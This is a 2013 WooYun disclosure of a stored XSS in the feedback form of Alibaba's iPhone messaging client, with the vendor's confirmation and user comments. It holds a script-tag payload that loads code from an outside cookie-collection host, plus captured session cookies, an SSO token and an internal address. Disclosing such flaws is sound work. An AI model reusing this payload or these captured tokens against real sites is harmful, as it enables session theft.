当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017693

漏洞标题:阿里巴巴xss跨站漏洞可获得内网cookies

相关厂商:阿里巴巴

漏洞作者: 阿峰

提交时间:2013-01-23 08:37

修复时间:2013-03-09 08:38

公开时间:2013-03-09 08:38

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-23: 细节已通知厂商并且等待厂商处理中
2013-01-24: 厂商已经确认,细节仅向厂商公开
2013-02-03: 细节向核心白帽子及相关领域专家公开
2013-02-13: 细节向普通白帽子公开
2013-02-23: 细节向实习白帽子公开
2013-03-09: 细节向公众公开

简要描述:

xss漏洞,大家都懂的,可获得cookies

详细说明:

只是抱着试试看的态度,没想到真的出现了...
该漏洞是出现在阿里旺旺的手机客户端,由于我同时测试的旺信和阿里旺旺两个软件,都属于阿里巴巴,所以不知道是哪一个出现的。为了安全,没再测试,直接来提交了。
测试版本为手机iphone版,
在软件的【反馈】里写入xss测试代码,
<script src="http://xss.sh3llc0de.com/?u=ddc05c"></script>
提交成功。
十分钟之内没有收到cookies,就失望了,但刚才去看了看...哈哈。

漏洞证明:

ali.png


信息
IP:121.0.29.205
地址:中国浙江杭州电信企业阿里巴巴公司
操作系统:Windows XP
浏览器:Chrome 24.0.1312.52
时间:2013-01-22 19:06:45
cookies
USER_COOKIE=BDC4D499AACAC40F7021847DB20A7620; SSO_TOKEN=594E51ADB89572C8F71E9C45F25A3684020D1640DEDF9946EAD585C231395E6711ED2B70672DF1CDFC2D299A49F5CB04; LAST_HEART_BEAT_TIME=9411E114E035D380C6A967891863C6D3; JSESSIONID=1g8tf43ade2j2e8ihhzxm20lk

地址
http://172.22.7.46:8080/usersuggestion/index.do?source=ios

修复方案:

过滤非法字符...

版权声明:转载请注明来源 阿峰@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-01-24 13:22

厂商回复:

非常感谢您对阿里巴巴的关注,您反馈的问题我们已经修复完毕。谢谢,稍后会发送礼品表示感谢~~ O(∩_∩)O

最新状态:

暂无


漏洞评价:

评论

  1. 2013-01-23 08:40 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @xsser 内网cookies威胁在哪里,基本后台进不去感觉用处不大

  2. 2013-01-23 08:52 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    @小胖胖要减肥 实话,内网渗透有用(*^__^*)

  3. 2013-01-23 10:33 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    确认可以获取到cookie并成功登陆??

  4. 2013-02-16 01:44 | GuoKer(ZhuLiu) ( 普通白帽子 | Rank:168 漏洞数:21 | 在校学生党的路过 霸气侧漏)

    javascript可以执行shellcode,想想网马,危害在哪里~~~~~